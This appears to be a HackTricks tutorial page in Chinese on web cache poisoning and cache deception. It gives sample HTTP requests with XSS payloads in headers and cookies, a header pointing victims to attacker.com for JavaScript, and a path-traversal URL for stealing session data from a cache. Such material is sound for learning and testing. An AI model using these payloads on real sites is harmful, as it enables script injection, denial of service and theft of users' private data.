.. | ||
cache-poisoning-to-dos.md | ||
README.md |
缓存毒化和缓存欺骗
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs收藏
- 加入 💬 Discord群 或 电报群 或在Twitter上关注我们 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
使用Trickest可以轻松构建和自动化工作流程,使用世界上最先进的社区工具。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
区别
Web缓存毒化和Web缓存欺骗有什么区别?
- 在Web缓存毒化中,攻击者导致应用程序将一些恶意内容存储在缓存中,并且这些内容从缓存中提供给其他应用程序用户。
- 在Web缓存欺骗中,攻击者导致应用程序将属于另一个用户的一些敏感内容存储在缓存中,然后攻击者从缓存中检索这些内容。
缓存毒化
缓存毒化旨在操纵客户端缓存,以强制客户端加载意外的、部分的或受攻击者控制的资源。受影响页面的受欢迎程度决定了影响的程度,因为受污染的响应仅提供给在缓存污染期间访问页面的用户。
执行缓存毒化攻击涉及几个步骤:
- 识别无键输入:这些是虽然不是请求缓存所必需的参数,但可以改变服务器返回的响应。识别这些输入至关重要,因为它们可以被利用来操纵缓存。
- 利用无键输入:在识别无键输入后,下一步涉及弄清如何滥用这些参数,以使服务器的响应以有利于攻击者的方式进行修改。
- 确保毒化响应被缓存:最后一步是确保操纵的响应被存储在缓存中。这样,任何在缓存被毒化时访问受影响页面的用户都将收到受污染的响应。
发现:检查HTTP头
通常,当响应被存储在缓存中时,会有一个指示的头部,您可以在这篇文章中查看应该注意的头部:HTTP缓存头部。
发现:缓存错误代码
如果您认为响应被存储在缓存中,可以尝试发送带有错误头部的请求,应该会收到状态码400的响应。然后尝试正常访问请求,如果响应是400状态码,则表示存在漏洞(甚至可以执行DoS攻击)。
您可以在以下位置找到更多选项:
{% content-ref url="cache-poisoning-to-dos.md" %} cache-poisoning-to-dos.md {% endcontent-ref %}
但请注意,有时这些类型的状态码不会被缓存,因此此测试可能不可靠。
发现:识别和评估无键输入
您可以使用Param Miner来暴力破解可能会改变页面响应的参数和头部。例如,页面可能正在使用X-Forwarded-For
头部指示客户端从那里加载脚本:
<script type="text/javascript" src="//<X-Forwarded-For_value>/resources/js/tracking.js"></script>
引发后端服务器的有害响应
通过识别的参数/标头,检查它是如何被清理以及它是如何反映或影响来自标头的响应的。您可以以任何方式滥用它(执行 XSS 或加载由您控制的 JS 代码?执行 DoS?...)
获取响应缓存
一旦您确定了可以滥用的页面,要使用的参数/标头以及如何滥用它,您需要将页面缓存。根据您尝试缓存的资源,这可能需要一些时间,您可能需要尝试几秒钟。
响应中的标头**X-Cache
可能非常有用,因为当请求未被缓存时,它可能具有值miss
,而当它被缓存时,它可能具有值hit
。
标头Cache-Control
也很有趣,可以知道资源是否被缓存,下次资源将再次被缓存的时间是什么时候:Cache-Control: public, max-age=1800
另一个有趣的标头是Vary
。此标头通常用于指示其他标头**,即使它们通常是无键的,也被视为缓存键的一部分。因此,如果用户知道受害者的 User-Agent
,他可以为使用该特定 User-Agent
的用户毒害缓存。
与缓存相关的另一个标头是**Age
**。它定义了对象在代理缓存中存在的秒数。
在缓存请求时,要小心使用标头,因为其中一些可能会意外使用为键,受害者将需要使用相同的标头。始终使用不同的浏览器测试缓存投毒以检查是否有效。
利用示例
最简单的示例
像 X-Forwarded-For
这样的标头在响应中未经清理地反映出来。
您可以发送基本的 XSS 负载并毒害缓存,因此每个访问该页面的人都将受到 XSS 攻击:
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"
Note that this will poison a request to /en?region=uk
not to /en
缓存投毒导致拒绝服务攻击
{% content-ref url="cache-poisoning-to-dos.md" %} cache-poisoning-to-dos.md {% endcontent-ref %}
利用网络缓存投毒来利用cookie处理漏洞
Cookie也可能反映在页面的响应中。如果您可以滥用它来引发跨站脚本攻击,您可能能够利用恶意缓存响应中加载的多个客户端中的跨站脚本攻击。
GET / HTTP/1.1
Host: vulnerable.com
Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
利用路径遍历进行缓存污染以窃取 API 密钥
这篇文章解释了 如何通过类似 https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123
的 URL 来窃取 OpenAI API 密钥,因为任何匹配 /share/*
的内容都会被缓存,而 Cloudflare 在请求到达 Web 服务器时并未对 URL 进行规范化。
利用多个标头来利用 Web 缓存污染漏洞
有时,您需要利用多个未加密的输入来滥用缓存。例如,如果您将 X-Forwarded-Host
设置为您控制的域,并将 X-Forwarded-Scheme
设置为 http
,如果服务器将所有HTTP请求转发到 HTTPS,并使用标头 X-Forwarded-Scheme
作为重定向的域名。您可以通过重定向控制页面指向的位置。
GET /resources/js/tracking.js HTTP/1.1
Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
X-Forwarded-Scheme: http
利用有限的 Vary
头部
如果你发现 X-Host
头部被用作域名来加载一个JS资源,但响应中的 Vary
头部指示了 User-Agent
。那么,你需要找到一种方法来窃取受害者的 User-Agent,并使用该用户代理程序来操纵缓存:
GET / HTTP/1.1
Host: vulnerbale.net
User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
X-Host: attacker.com
Fat Get
使用 URL 和正文中的请求发送 GET 请求。如果 Web 服务器使用正文中的请求,但缓存服务器缓存了来自 URL 的请求,则访问该 URL 的任何人实际上将使用来自正文的参数。就像 James Kettle 在 Github 网站发现的漏洞一样:
GET /contact/report-abuse?report=albinowax HTTP/1.1
Host: github.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
report=innocent-victim
参数伪装
例如,在 Ruby 服务器中,可以使用字符 ;
而不是 &
来分隔 参数。这可以用来将非键参数值放入键参数中并滥用它们。
Portswigger 实验室:https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking
利用 HTTP 缓存投毒滥用 HTTP 请求走私
在这里了解如何通过滥用 HTTP 请求走私来执行利用 HTTP 缓存投毒攻击。
Web 缓存投毒的自动化测试
Web 缓存漏洞扫描器可用于自动测试 Web 缓存投毒。它支持许多不同的技术,并且高度可定制。
示例用法:wcvs -u example.com
使用 Trickest 可以轻松构建和 自动化工作流程,使用全球 最先进 的社区工具。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
可能存在漏洞的示例
Apache Traffic Server (CVE-2021-27577)
ATS 在 URL 中转发了片段而没有剥离它,并且仅使用主机、路径和查询生成缓存键(忽略片段)。因此,请求 /#/../?r=javascript:alert(1)
被发送到后端作为 /#/../?r=javascript:alert(1)
,缓存键中不包含有效载荷,只有主机、路径和查询。
GitHub CP-DoS
在内容类型标头中发送错误值会触发 405 缓存响应。缓存键包含了 cookie,因此只能攻击未经授权的用户。
GitLab + GCP CP-DoS
GitLab 使用 GCP 存储静态内容。GCP 存储桶 支持 头部 x-http-method-override
。因此,可以发送头部 x-http-method-override: HEAD
并将缓存投毒为返回空响应主体。它还可以支持方法 PURGE
。
Rack 中间件(Ruby on Rails)
在 Ruby on Rails 应用程序中,经常使用 Rack 中间件。Rack 代码的目的是获取 x-forwarded-scheme
标头的值并将其设置为请求的方案。当发送标头 x-forwarded-scheme: http
时,会发生到同一位置的 301 重定向,可能导致对该资源的拒绝服务(DoS)。此外,应用程序可能会识别 X-forwarded-host
标头并将用户重定向到指定的主机。这种行为可能导致从攻击者服务器加载 JavaScript 文件,存在安全风险。
403 和存储桶
Cloudflare 以前缓存 403 响应。尝试使用不正确的授权标头访问 S3 或 Azure 存储 Blob 会导致缓存的 403 响应。尽管 Cloudflare 已停止缓存 403 响应,但这种行为可能仍存在于其他代理服务中。
注入键参数
缓存通常在缓存键中包含特定的 GET 参数。例如,Fastly 的 Varnish 在请求中缓存了 size
参数。但是,如果还发送了参数的 URL 编码版本(例如,siz%65
)并附带错误值,缓存键将使用正确的 size
参数构建。然而,后端将处理 URL 编码参数中的值。对第二个 size
参数进行 URL 编码会导致缓存中省略该参数,但后端会使用它。将此参数赋值为 0 会导致可缓存的 400 Bad Request 错误。
用户代理规则
一些开发人员阻止与高流量工具(如 FFUF 或 Nuclei)匹配的用户代理的请求,以管理服务器负载。具有讽刺意味的是,这种方法可能会引入缓存投毒和 DoS 等漏洞。
非法标头字段
RFC7230 指定标头名称中可接受的字符。标头包含指定 tchar 范围之外的字符应理想情况下触发 400 Bad Request 响应。实际上,服务器并不总是遵循这一标准。一个值得注意的例子是 Akamai,它会转发带有无效字符的标头并缓存任何 400 错误,只要不存在 cache-control
标头。发现了一个可利用的模式,发送带有非法字符的标头,例如 \
,会导致可缓存的 400 Bad Request 错误。
查找新标头
https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6
缓存欺骗
缓存欺骗的目标是使客户端加载将由缓存保存的资源及其敏感信息。
首先请注意,例如 .css
、.js
、.png
等扩展名通常被配置为保存在缓存中。因此,如果访问 www.example.com/profile.php/nonexistent.js
,缓存可能会存储响应,因为它看到了 .js
扩展名。但是,如果应用程序正在使用存储在 www.example.com/profile.php 中的敏感用户内容进行重放,您可以从其他用户那里窃取这些内容。
其他要测试的内容:
- www.example.com/profile.php/.js
- www.example.com/profile.php/.css
- www.example.com/profile.php/test.js
- www.example.com/profile.php/../test.js
- www.example.com/profile.php/%2e%2e/test.js
- 使用较少人知道的扩展名,如
.avif
另一个非常明显的例子可以在这篇文章中找到:https://hackerone.com/reports/593712。
在这个例子中,解释了如果加载一个不存在的页面,如 http://www.example.com/home.php/non-existent.css,将返回 http://www.example.com/home.php 的内容(带有用户的敏感信息),并且缓存服务器将保存结果。
然后,攻击者可以在他们自己的浏览器中访问 http://www.example.com/home.php/non-existent.css 并观察之前访问过的用户的机密信息。
请注意,缓存代理应该根据文件的扩展名(.css)而不是根据内容类型来配置缓存文件。在示例 http://www.example.com/home.php/non-existent.css 中,将具有 text/html
内容类型,而不是预期的 text/css
MIME 类型(这是 .css 文件的预期类型)。
在这里了解如何通过滥用 HTTP 请求走私来执行利用 HTTP 请求走私来执行 Web 缓存欺骗攻击。
自动化工具
- toxicache: 用于查找网页缓存投毒漏洞的 Golang 扫描器,可在一组 URL 中测试多种注入技术。
参考资料
- https://portswigger.net/web-security/web-cache-poisoning
- https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities
- https://hackerone.com/reports/593712
- https://youst.in/posts/cache-poisoning-at-scale/
- https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9
- https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/
使用 Trickest 可轻松构建并 自动化 由全球 最先进 社区工具驱动的工作流。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)!
支持 HackTricks 的其他方式:
- 如果您想在 HackTricks 中看到您的 公司广告 或 下载 PDF 版本的 HackTricks,请查看 订阅计划!
- 获取 官方 PEASS & HackTricks 商品
- 探索 PEASS 家族,我们的独家 NFT 收藏品
- 加入 💬 Discord 群组 或 电报群组 或 关注 我们的 Twitter 🐦 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。